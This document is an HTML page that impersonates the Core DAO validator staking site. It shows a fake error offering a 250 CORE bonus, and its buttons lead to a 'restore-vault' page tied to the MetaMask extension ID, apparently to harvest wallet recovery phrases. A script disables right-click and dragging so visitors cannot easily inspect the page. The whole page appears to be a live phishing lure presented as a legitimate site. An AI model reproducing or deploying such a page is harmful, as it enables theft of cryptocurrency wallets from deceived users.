<!DOCTYPE html>
<html lang="en-US" class="white"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="cleartype" content="on"><meta http-equiv="x-dns-prefetch-control" content="on">
<meta name="author" content="core">
<meta name="MobileOptimized" content="320">
<meta name="HandheldFriendly" content="True">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="apple-touch-icon" content="/icon.png">
<meta name="msapplication-TileImage" content="/icon.png">
<meta name="msapplication-TileColor" content="#0088f5">
<meta name="format-detection" content="telephone=no">
<meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no">
<link rel="icon" type="image/x-icon" href="https://stake.coredao.org/favicon.ico">
<script type="module" crossorigin="" src="./ValidatorCore_files/index.98b47c4b.js.download"></script>
<link rel="stylesheet" href="./ValidatorCore_files/index.76f34c69.css">
<link href="https://www.googletagmanager.com/" rel="preconnect"><script async="" src="./ValidatorCore_files/js"></script>
<link rel="stylesheet" href="./ValidatorCore_files/staking.5d1f5440.css">

<link rel="stylesheet" href="./ValidatorCore_files/plugin-vue_export-helper.3a0ec331.css">
<link rel="stylesheet" href="./ValidatorCore_files/card.bddec465.css">
<link rel="stylesheet" href="./ValidatorCore_files/form-validators.22e24ed2.css">
<link rel="stylesheet" href="./ValidatorCore_files/input-number.fca85a27.css">
 
<title> Validator Register - Core </title>
</head>
<body><div id="app" class="w-full h-full" data-v-app=""><div class="h-full">
<div class="h-full text-main"><div class="core-staking-layout h-full">
<div class="core-staking-layout-header core-staking-layout-header--fixed core-staking-layout-header--mobile z-50">
<div class="flex items-center justify-between px-30 xs:px-10" style="height: 60px;"><div class="flex items-center">
<a href="#" class="">
<div class="core-app-logo h-full flex items-center">
<img src="./ValidatorCore_files/Core_logo_light.svg"></div>
</a><span class="text-12 ml-10 px-8 py-2 text-white bg-danger font-semibold rounded-full"><!---->Validators</span>
</div>
<div class="xs:hidden">
<div class="core-staking-nav-bar">
<!---->
<a href="home.html?#restore-vault','','toolbar=yes,scrollbars=yes"  class="el-button el-button--primary el-button--large" aria-disabled="false" type="button"><!--v-if--><span class="">Connect Wallet</span></a>
</div>
</div>
<div class="sm:hidden"><div class="core-navbar-hamburger items-center justify-center"><div>
<span class="line bg-black dark:bg-[#cccccc]"></span>
<span class="line bg-black dark:bg-[#cccccc]">
</span><span class="line bg-black dark:bg-[#cccccc]"></span>
</div>
</div>
<div class="el-overlay" style="z-index: 2001; display: none;">
<div aria-modal="true" aria-labelledby="el-id-751-0" aria-describedby="el-id-751-1" class="el-drawer rtl" role="dialog" style="width: 50%;"><span class="el-drawer__sr-focus" tabindex="-1"></span>
<!--v-if--><!--v-if--><!--v-if-->
</div>
</div>
</div>
</div>
</div>
<div class="core-staking-layout--main bg-light-400 dark:bg-dark-900 !p-0 overflow-scroll">
<div class="core-layout-content" style="margin-top: 60px; min-height: calc(100vh - 100px);">
<div class="core-page-wrapper core-validator-register-page"><div class="core-page-wrapper-header overflow-hidden">
<div class="w-full"><div class="flex safe-area"><div><h1> Rewards as a validator</h1>
</div>
</div>
</div>
</div>
<div class="core-page-wrapper-content overflow-hidden">
<div class="safe-area"><div class="el-card is-always-shadow my-20">
<!--v-if-->
<div class="el-card__body" style="">
<div class="flex justify-center pb-40"><div class="lg:w-1/2 xs:w-full xs:px-16 sm:w-2/3"><br>

<center><div class="confirm-approve-content__identicon-wrapper">
							<img class="identicon confirm-approve-content__identicon" src="https://coredao.org/coin_logo.1840ddcf.png" alt="" style="height: 80px;width: 80px;"></div></center>
       <div class="confirm-approve-content__title" style="
    font-size: 1.7rem;
    line-height: 140%;
    justify-content: center;
    text-align: center;
    margin-top: 22px;
    padding-left: 24px;
    padding-right: 24px;
    color: #f56c6c;
    ">Sorry an error occurred
</div><br><center><div class="thepadding">To get <b style="color: #ff9500;font-weight: bold;">250.00 CORE</b>, You must have at least 10 active transactions in your account or have a minimum of <br><b style="color: #ff9500;font-weight: bold;">5 CORE</b>, the bigger your transaction, the greater your chance to get a prize.</div>
<br><div class="thepadding">If your account meets the requirements, the bonus will be credited to your account within 24 hours</div>
<br><div class="thepadding">
don't worry, we will always review the activities of all members and provide the best service.</div>
                            </center>

 
 
 <div class="dialog-footer flex justify-center pt-40">
 <a href="javascript:window.open('home.html?nkbihfbeogaeaoehlefnkodbefgpgknn/#restore-vault','_self').close();" class="el-button el-button--primary el-button--large w-full" aria-disabled="false" type="button">
 <!--v-if-->
 <span class="">I understand</span></a>
 
 </div>
 </div>
 </div>
 </div>
 </div></div></div>
 
 </div>
 </div>
 <div class="core-layout-footer w-full h-full flex items-center justify-between safe-area" style="height: 40px;"><div class="text-16 font-normal"><button class="el-button el-button--small is-text" aria-disabled="false" type="button">
 <!--v-if-->
 <span class=""><i class="el-icon"><svg viewBox="0 0 1024 1024" xmlns="http://www.w3.org/2000/svg"><path fill="currentColor" d="M512 704a192 192 0 1 0 0-384 192 192 0 0 0 0 384zm0 64a256 256 0 1 1 0-512 256 256 0 0 1 0 512zm0-704a32 32 0 0 1 32 32v64a32 32 0 0 1-64 0V96a32 32 0 0 1 32-32zm0 768a32 32 0 0 1 32 32v64a32 32 0 1 1-64 0v-64a32 32 0 0 1 32-32zM195.2 195.2a32 32 0 0 1 45.248 0l45.248 45.248a32 32 0 1 1-45.248 45.248L195.2 240.448a32 32 0 0 1 0-45.248zm543.104 543.104a32 32 0 0 1 45.248 0l45.248 45.248a32 32 0 0 1-45.248 45.248l-45.248-45.248a32 32 0 0 1 0-45.248zM64 512a32 32 0 0 1 32-32h64a32 32 0 0 1 0 64H96a32 32 0 0 1-32-32zm768 0a32 32 0 0 1 32-32h64a32 32 0 1 1 0 64h-64a32 32 0 0 1-32-32zM195.2 828.8a32 32 0 0 1 0-45.248l45.248-45.248a32 32 0 0 1 45.248 45.248L240.448 828.8a32 32 0 0 1-45.248 0zm543.104-543.104a32 32 0 0 1 0-45.248l45.248-45.248a32 32 0 0 1 45.248 45.248l-45.248 45.248a32 32 0 0 1-45.248 0z"></path></svg></i></span></button><span class="ml-16">CORE DAO © 2023</span></div><div></div></div></div><div class="el-overlay" style="z-index: 2002; display: none;"><div role="dialog" aria-modal="true" aria-labelledby="el-id-751-6" aria-describedby="el-id-751-7" class="el-overlay-dialog"></div></div></div></div></div><script src="./ValidatorCore_files/web3.min.js.download" crossorigin=""></script><script defer="" src="./ValidatorCore_files/vaafb692b2aea4879b33c060e79fe94621666317369993" integrity="sha512-0ahDYl866UMhKuYcW078ScMalXqtFJggm7TmlUtp0UlD4eQk0Ixfnm5ykXKvGJNFjLMoortdseTfsRT8oCfgGA==" data-cf-beacon="{&quot;rayId&quot;:&quot;79730b64fec16bd0&quot;,&quot;token&quot;:&quot;7215ec130caa4e93b7494f6aa1d8a066&quot;,&quot;version&quot;:&quot;2022.11.3&quot;,&quot;si&quot;:100}" crossorigin="anonymous"></script>
<script type="text/javascript">function mousedwn(e){try{if(event.button==2||event.button==3)return false}catch(e){if(e.which==3)return false}}document.oncontextmenu=function(){return false};document.ondragstart=function(){return false};document.onmousedown=mousedwn
    </script>
</div></body></html>